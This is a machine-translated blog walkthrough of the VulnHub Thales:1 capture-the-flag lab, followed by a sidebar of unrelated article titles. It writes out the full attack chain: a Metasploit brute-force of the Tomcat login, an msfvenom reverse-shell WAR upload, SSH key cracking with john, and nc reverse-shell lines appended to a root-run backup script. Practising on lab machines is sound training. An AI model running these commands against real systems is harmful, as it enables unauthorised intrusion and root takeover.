当前位置:网站首页>[vulnhub range] thales:1
[vulnhub range] thales:1
2022-07-07 16:24:00 【Nailaoyyds】
Catalog
3、 ... and 、 Elevated privileges
0x02 Dictionary explosion edit
Preface
describe
brief introduction : Open your eyes , Another angle
Include 2 A sign :user.txt and root.txt.
Download link
https://download.vulnhub.com/thales/Thales.zip.torrent
0x00 Introduction to the environment kali 192.168.56.102 Thales Drone aircraft 192.168.56.101
One 、 information gathering
0x00 arp-scan scanning
arp-scan -I eth1 -l # Scan network card LAN
0x01 nmap scanning
Scan to two network segments Not sure which nmap Scan scan two IP
Open ports 22 and 8080
Visit Site , User name and password are required
Two 、 Exploit
0x00 msfconsole utilize
msf Search for tomcat login
To configure payload
user name tomcat password role1
Login successfully
0x01 Upload files
Look for function points , Found the upload point
utilize kali Generate war File Trojan do rebound shell msfvenom -p java/jsp_shell_reverse_tcp lhost=192.168.56.102 lport=5555 -f war -o myshell.war
Upload successful , And run
3、 ... and 、 Elevated privileges
0x00 rebound shell
Listening port
Upgrade transaction mutual shell
sudo -l # Need a password , Unknown stay home User found under file Thales
stay `notes.txt` Found in the file `/usr/local/bin/backup.sh View file contents
0x02 Dictionary explosion
Find out .ssh Folder
It is found that the private key can be used ssh2john.py Generate password file explosion
use ssh2john.py
Compile the script
/usr/share/john/ssh2john.py id_rsa > crack.txt
john --wordlist=/usr/share/wordlists/rockyou.txt crack.txt
Burst out the code vodka06
Switching users
0x03 user.txt
see user.txt--- first flag
notes.txt yes root The powers of the , There may be something inside
0x04 rebound shell
notice backup.sh It has executive authority , Can write bounce shell
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.102 666 >/tmp/f" >> backup.sh
File content editing will directly replace , Append for selection
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.102 9999 >/tmp/f" >> backup.sh
0x05 root.txt
monitor 9999, After writing, you will connect by yourself
summary
Thales Learned
msf The use of blasting dictionary
rsa Use of private key ciphertext
边栏推荐
- Power of leetcode-231-2
- Laravel constructor and middleware execution order
- How does geojson data merge the boundaries of regions?
- A link opens the applet code. After compilation, it is easy to understand
- How to query the data of a certain day, a certain month, and a certain year in MySQL
- 华东师大团队提出,具有DNA调控电路的卷积神经网络的系统分子实现
- PHP中exit,exit(0),exit(1),exit(‘0’),exit(‘1’),die,return的区别
- IP地址和物理地址有什么区别
- 【知识小结】PHP使用svn笔记总结
- Common training data set formats for target tracking
猜你喜欢
HAVE FUN | “飞船计划”活动最新进展
Shipping companies' AI products are mature, standardized and applied on a large scale. CIMC, the global leader in port and shipping AI / container AI, has built a benchmark for international shipping
Apache Doris just "graduated": why should we pay attention to this kind of SQL data warehouse?
神经网络c语言中的指针是怎么回事
PyTorch 中的乘法:mul()、multiply()、matmul()、mm()、mv()、dot()
Dotween -- ease function
分步式监控平台zabbix
Plate - forme de surveillance par étapes zabbix
Odoo集成Plausible埋码监控平台
通知Notification使用全解析
随机推荐
Logback日志框架第三方jar包 免费获取
TiDB For PostgreSQL和YugabyteDB在Sysbench上的性能对比
Mysql database basic operation DQL basic query
谈谈 SAP iRPA Studio 创建的本地项目的云端部署问题
Three. JS introductory learning notes 19: how to import FBX static model
预测——灰色预测
Unity的三种单例模式(饿汉,懒汉,MonoBehaviour)
深度之眼(六)——矩阵的逆(附:logistic模型一些想法)
航天宏图信息中标乌鲁木齐某单位数据库系统研发项目
AE learning 01: AE complete project summary
Balanced binary tree (AVL)
01tire+链式前向星+dfs+贪心练习题.1
MySQL数据库基本操作-DQL-基本查询
pycharm 终端部启用虚拟环境
深度之眼(七)——矩阵的初等变换(附:数模一些模型的解释)
如何在shell中实现 backspace
leetcode 241. Different Ways to Add Parentheses 为运算表达式设计优先级(中等)
js中复选框checkbox如何判定为被选中
Sysom case analysis: where is the missing memory| Dragon lizard Technology
Apache Doris just "graduated": why should we pay attention to this kind of SQL data warehouse?